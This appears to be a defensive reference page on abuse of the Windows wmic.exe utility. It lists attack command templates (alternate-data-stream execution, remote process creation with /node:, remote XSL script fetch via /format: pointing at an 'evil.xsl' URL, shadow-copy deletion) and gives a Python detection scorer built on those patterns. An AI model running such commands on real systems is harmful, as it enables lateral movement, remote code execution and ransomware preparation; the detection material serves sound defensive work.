wmic.exe
wmic.exe is the WMI command-line utility, a tool for querying and controlling Windows through Windows Management Instrumentation (WMI). Administrators use it to read system information, manage processes and services, and run commands on remote machines. Microsoft has deprecated it, but it remains a powerful and heavily abused tool wherever it is still present.
File identity
Not observed.
Execution context
Not observed.
Ancestry
Not observed.
Behavior
Not observed.
- wmic.exe process call create "{PATH_ABSOLUTE}:program.exe" (ADS · Execute a binary hidden in an Alternate Data Stream to evade defensive countermeasures)
- wmic.exe process call create "{CMD}" (Execute · Execute a binary from wmic to evade defensive countermeasures)
- wmic.exe /node:"192.168.0.1" process call create "{CMD}" (Execute · Execute a binary on a remote system)
- wmic.exe process get brief /format:"{REMOTEURL:.xsl}" (Execute · Execute binary on remote system)
- wmic.exe process get brief /format:"{PATH_SMB:.xsl}" (Execute · Execute script from remote system)
- wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe" (Copy · Copy file)
Indicators
Not observed.
Analysis
wmic.exe is a command-line front-end to WMI, the management layer that exposes almost everything about a Windows system (hardware, the operating system, processes, services, and installed software) as queryable objects. The genuine binary lives at C:\Windows\System32\wbem\wmic.exe (note the wbem subfolder), with a 32-bit copy under SysWOW64\wbem. Microsoft deprecated wmic in Windows 10 version 21H1 in favor of PowerShell's CIM cmdlets, so on the newest builds the binary may be absent. WMI itself is not going away; only this command-line front-end is.
It can read (wmic process list, wmic os get), act locally (process call create starts a program), and reach other hosts with the /node: switch for remote management. The /format: switch applies an XSL stylesheet to the output, and that stylesheet can be a local file or a URL. Anything WMI can do, wmic can drive from a single command line.
Legitimately, wmic is run by administrators, inventory and management scripts, and software installers. Because the binary is identical in every case, the parent process and the command line are what distinguish one instance from another, and on current Windows it appears less and less as PowerShell takes over the role.
wmic.exe is a long-standing execution and lateral-movement tool (T1047). wmic process call create launches a program locally, and with /node: and credentials it launches one on a remote machine, a classic way to move across a network under a trusted, signed binary.
It is also a proxy-execution path through XSL, the technique known as Squiblytwo (T1220). A command line like wmic process get brief /format:"https://host/evil.xsl" makes wmic fetch a remote stylesheet and run the JScript or VBScript embedded in it, with nothing written to disk. A /format: pointing at a URL is the signature.
Ransomware leans on it too: wmic shadowcopy delete removes Volume Shadow Copies ahead of encryption so the victim cannot roll back (T1490). The same tool is a favorite for enumerating installed antivirus products. In each case the binary is the genuine signed wmic, so path and signature checks pass; the command-line verb and the parent process are what reveal the intent.
- Image path other than C:\Windows\System32\wbem\wmic.exe or its SysWOW64\wbem copy (high)
- process call create (local or remote program execution) (high)
- /node: targeting a remote host (high)
- /format: referencing a URL or a remote XSL stylesheet (high)
- shadowcopy delete (destroying recovery points) (high)
- Parent is an Office application, cmd.exe, powershell.exe, wscript.exe, cscript.exe, or mshta.exe (high)
- Queries against root\securitycenter2 or antivirusproduct (security-product enumeration) (med)
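The indicator list above, turned into a small scorer as an added example (not code from the page's source): it applies each indicator to process-creation events carrying Sysmon Event ID 1 field names (Image, ParentImage, CommandLine) and returns the matches with their severity. The specific Office process names and the sample events are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath
# On-disk locations of the genuine binary (64-bit and 32-bit copies).
GENUINE_PATHS = {r"c:\windows\system32\wbem\wmic.exe", r"c:\windows\syswow64\wbem\wmic.exe"}
# Parents that should rarely spawn wmic.exe. The Office process names are an
# assumption made for this example; the page only says "an Office application".
SUSPICIOUS_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                      "mshta.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
# (indicator, pattern applied to the normalised command line, severity)
CMDLINE_RULES = [
    ("process call create", re.compile(r"\bprocess\s+call\s+create\b"), "high"),
    ("/node: remote target", re.compile(r"/node:"), "high"),
    ("/format: URL or UNC XSL", re.compile(r'/format:\s*"?(?:https?://|\\\\)'), "high"),
    ("shadowcopy delete", re.compile(r"\bshadowcopy\s+delete\b"), "high"),
    ("security-product enumeration",
     re.compile(r"securitycenter2|antivirusproduct"), "med"),
]

def _basename(path):
    return PureWindowsPath(path).name.lower()

def score_event(event):
    """Return [(indicator, severity), ...] for one Sysmon-style process-creation event dict."""
    if _basename(event["Image"]) != "wmic.exe":
        return []
    hits = []
    if event["Image"].lower() not in GENUINE_PATHS:
        hits.append(("image path outside the wbem folder", "high"))
    cmd = " ".join(event["CommandLine"].split()).lower()  # collapse spacing, ignore case
    for name, pattern, severity in CMDLINE_RULES:
        if pattern.search(cmd):
            hits.append((name, severity))
    parent = _basename(event["ParentImage"])
    if parent in SUSPICIOUS_PARENTS:
        hits.append(("suspicious parent " + parent, "high"))
    return hits

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Program Files\Inventory\agent.exe",
     "CommandLine": "wmic os get Caption,Version /format:list"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wmic process get brief /format:"https://example.invalid/a.xsl"'},
    {"Image": r"C:\Users\Public\wmic.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'wmic /node:"192.168.0.1" process call create "notepad.exe"'},
]
```

The benign inventory query scores nothing, while the local /format: URL and the remote process call create each light up both a command-line rule and the parent rule.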
Telemetry
Not observed.